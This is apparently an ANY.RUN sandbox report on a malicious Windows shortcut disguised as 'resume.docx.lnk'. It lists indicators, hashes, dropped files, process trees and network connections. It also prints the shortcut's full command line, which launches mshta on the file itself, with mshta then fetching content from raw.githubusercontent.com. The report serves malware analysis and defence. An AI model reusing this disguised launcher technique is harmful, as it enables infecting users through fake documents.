File name:

resume.docx.lnk

Full analysis: https://app.any.run/tasks/eaf4d3ea-6afb-4ac5-9a9f-48c8f284b7aa
Verdict: Malicious activity
Analysis date: December 06, 2024, 11:13:42
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
github
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=1, Unicoded, HasEnvironment "%windir%\system32\cmd.exe", MachineID uran, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Thu Jun 13 12:22:21 2024, atime=Fri Nov 29 19:01:05 2024, mtime=Thu Jun 13 12:22:21 2024, length=289792, window=normal, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5:

6076EAF95EF25DBC49552FFABB7AF05F

SHA1:

159826D32AE3713C836175FAFC22C30F30C1CE29

SHA256:

6F3194EACF6A888B7CF60AB43F5BAB1027C0803609183AA13AB3DDD130FD3ECC

SSDEEP:

384:7w1lqQdSh7G+d6obKaYVeTZ4VtNz84JUyIlKGa02HkdCzmIMYK3VhD:SqJEobKXukPz8eUykKGazDMT33

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Sends HTTP request (SCRIPT)

      • mshta.exe (PID: 5780)

    • Opens an HTTP connection (SCRIPT)

      • mshta.exe (PID: 5780)

    • Creates internet connection object (SCRIPT)

      • mshta.exe (PID: 5780)

    • Accesses environment variables (SCRIPT)

      • cscript.exe (PID: 6576)

    • Gets TEMP folder path (SCRIPT)

      • cscript.exe (PID: 6576)

    • Deletes a file (SCRIPT)

      • mshta.exe (PID: 5780)

  • SUSPICIOUS

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • mshta.exe (PID: 5780)

    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 5780)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • mshta.exe (PID: 5780)
      • cscript.exe (PID: 6576)

    • The process executes VB scripts

      • Word.exe (PID: 6548)

    • Saves data to a binary file (SCRIPT)

      • mshta.exe (PID: 5780)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 5780)
      • Word.exe (PID: 6548)

    • Checks whether a specific file exists (SCRIPT)

      • cscript.exe (PID: 6576)

    • Executing commands from a ".bat" file

      • cscript.exe (PID: 6576)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 5780)
      • cscript.exe (PID: 6576)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 4164)

    • Runs shell command (SCRIPT)

      • cscript.exe (PID: 6576)
      • mshta.exe (PID: 5780)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6716)

    • Starts application with an unusual extension

      • Word.exe (PID: 6548)

    • Reads data from a file (SCRIPT)

      • mshta.exe (PID: 5780)

    • Hides command output

      • cmd.exe (PID: 4164)

    • Detected use of alternative data streams (AltDS)

      • Word.exe (PID: 6548)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 5780)

    • Checks supported languages

      • Word.exe (PID: 6548)
      • base.pk (PID: 5992)

    • Checks proxy server information

      • mshta.exe (PID: 5780)

    • Create files in a temporary directory

      • Word.exe (PID: 6548)

    • Reads security settings of Internet Explorer

      • cscript.exe (PID: 6576)

    • The process uses the downloaded file

      • cscript.exe (PID: 6576)
      • WINWORD.EXE (PID: 5308)
      • mshta.exe (PID: 5780)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • WINWORD.EXE (PID: 5308)

    • Sends debugging messages

      • WINWORD.EXE (PID: 5308)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, CommandArgs, IconFile, Unicode, ExpString, TargetMetadata
FileAttributes: Archive
CreateDate: 2024:06:13 12:22:21+00:00
AccessDate: 2024:11:29 19:01:05+00:00
ModifyDate: 2024:06:13 12:22:21+00:00
TargetFileSize: 289792
IconIndex: 1
RunWindow: Normal
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
DriveSerialNumber: 1ABE-90A2
VolumeLabel: Windows 10
LocalBasePath: C:\Windows\System32\cmd.exe
CommandLineArguments: /C "if exist %CD%\resume.docx.lnk (start "" /B "mshta" "%CD%\resume.docx.lnk" & exit 0) else for /f "delims=" %a in ('dir /b /o-d %TEMP%\*.rartemp') do start "" /B "mshta" "%TEMP%\%a\resume.docx.lnk" & exit 0"
IconFileName: %SystemRoot%\System32\SHELL32.dll
MachineID: uran
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
151
Monitored processes
20
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs mshta.exe word.exe no specs word.exe cscript.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs timeout.exe no specs secedit.exe no specs timeout.exe no specs try5ed0.tmp no specs base.pk no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs winword.exe ai.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2136\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exebase.pk
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2220\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2452ping -n 3 127.0.0.1C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
2744\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4164"C:\Windows\System32\cmd.exe" /c ping -n 3 127.0.0.1>nulC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
5308"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -EmbeddingC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
5464"C:\Windows\System32\cmd.exe" /C "if exist %CD%\resume.docx.lnk (start "" /B "mshta" "%CD%\resume.docx.lnk" & exit 0) else for /f "delims=" %a in ('dir /b /o-d C:\Users\admin\AppData\Local\Temp\*.rartemp') do start "" /B "mshta" "C:\Users\admin\AppData\Local\Temp\%a\resume.docx.lnk" & exit 0"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
5780"mshta" "C:\Users\admin\AppData\Local\Temp\resume.docx.lnk" C:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
5992base.pkC:\Users\admin\AppData\Local\Temp\base.pkWord.exe
User:
admin
Integrity Level:
HIGH
Exit code:
1
Modules
Images
c:\users\admin\appdata\local\temp\base.pk
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6372"C:\Users\admin\AppData\Local\Temp\Word.exe" C:\Users\admin\AppData\Local\Temp\Word.exemshta.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\appdata\local\temp\word.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
Total events
16 310
Read events
15 921
Write events
361
Delete events
28

Modification events

(PID) Process:(5780) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5780) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5780) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(5308) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
1
(PID) Process:(5308) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
1
(PID) Process:(5308) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
1
(PID) Process:(5308) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
1
(PID) Process:(5308) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
1
(PID) Process:(5308) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
1
(PID) Process:(5308) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:pt-br
Value:
1
Executable files
9
Suspicious files
121
Text files
50
Unknown types
4

Dropped files

PID
Process
Filename
Type
5780mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\resume[1].docexecutable
MD5:10233969EF917B123B0249EF8FE64536
SHA256:B0CDF21D7F402C86A7F87BEAA896AD967B3453D2A28215C31BA655445A40ABB8
5308WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:C58660CE5AE55CBBDF61E8922E975276
SHA256:D78C71C2A2B63413623CE72FCE25897AE95D6E68E05051578FF338C0EBBDA162
6548Word.exeC:\Users\admin\AppData\Local\Temp\gpmsc_externalDBMSleanup.battext
MD5:C5148520A262094D3CF9155A4F6C6B51
SHA256:AE674F232BF01C2FC7D1FDD88BDF3136261BB8B9733D7D2047981909A6913F9F
6548Word.exeC:\Users\admin\AppData\Local\Temp\58C2.tmpexecutable
MD5:3964CB1289BD1D131EF2E000617D45A2
SHA256:0449B5AB5219D807C35634FE263DDE16C6AEA73633378A08553CBF09E977244A
5780mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419binary
MD5:513D3B1339DA0BF0F3C0DE494972A037
SHA256:60DD835F92BB14F2F281EC94AFAA84454C16FCEB1B002FAE2AB17672AC8881F3
6548Word.exeC:\Users\admin\AppData\Local\Temp\fne5ECF.tmpbinary
MD5:C41358C0844D2BCA1CBA7C782BDB02A2
SHA256:DCCE213AB6543D8C283D77B4A526F6FF9A065F97BBB9F2007A4319034F78A1CC
5780mshta.exeC:\Users\admin\AppData\Local\Temp\base.pkexecutable
MD5:EC2B6BBFA9407C34E0D4B6B34AE1201C
SHA256:C76EA6A3FB5616BA106706E75B27F2CCAB62B3F6CA027DF1B5CD85A9D0448C33
6548Word.exeC:\Users\admin\AppData\Local\Temp\ahh58D2.tmp.vbstext
MD5:0A1C237316E11EC81B1DF21773710C40
SHA256:1CF290B40445860679BE3BED68C03A0E555C7A3FA91ABA8C216A34CC345A4DBE
6716cmd.exeC:\Users\admin\AppData\Local\Temp\secuserpol25086.cfgini
MD5:5CAEE3B83983062E18D4DBAE58D9946D
SHA256:DB3DE11D4266F67ECF154F0380FA8B4020D6CDDC403F9307739BA47AE4C1C375
5780mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\base[1].pkexecutable
MD5:EC2B6BBFA9407C34E0D4B6B34AE1201C
SHA256:C76EA6A3FB5616BA106706E75B27F2CCAB62B3F6CA027DF1B5CD85A9D0448C33
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
19
TCP/UDP connections
83
DNS requests
30
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5308
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
5308
WINWORD.EXE
GET
200
104.124.11.17:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6212
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
5308
WINWORD.EXE
GET
200
104.124.11.17:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
whitelisted
5308
WINWORD.EXE
GET
200
104.124.11.17:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
5308
WINWORD.EXE
GET
200
104.124.11.17:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
5308
WINWORD.EXE
GET
200
104.124.11.17:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
5308
WINWORD.EXE
GET
104.124.11.17:80
http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
svchost.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
5496
svchost.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
4712
MoUsoCoreWorker.exe
104.76.201.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5496
svchost.exe
104.76.201.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
2.20.142.155:443
www.bing.com
Akamai International B.V.
DE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
5780
mshta.exe
185.199.108.133:443
raw.githubusercontent.com
FASTLY
US
shared
4
System
192.168.100.255:138
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
  • 104.124.11.17
  • 104.124.11.58
whitelisted
www.microsoft.com
  • 104.76.201.160
whitelisted
google.com
  • 172.217.16.142
whitelisted
www.bing.com
  • 2.20.142.155
  • 2.20.142.187
  • 2.20.142.154
  • 92.122.215.95
  • 2.20.142.251
  • 92.122.215.57
  • 2.20.142.3
  • 92.122.215.65
  • 92.122.215.53
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
raw.githubusercontent.com
  • 185.199.108.133
  • 185.199.109.133
  • 185.199.111.133
  • 185.199.110.133
shared
login.live.com
  • 40.126.32.76
  • 40.126.32.136
  • 40.126.32.133
  • 40.126.32.74
  • 40.126.32.140
  • 40.126.32.138
  • 20.190.160.14
  • 20.190.160.22
whitelisted
go.microsoft.com
  • 2.19.246.123
whitelisted
officeclient.microsoft.com
  • 52.109.76.240
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
resume.docx.lnk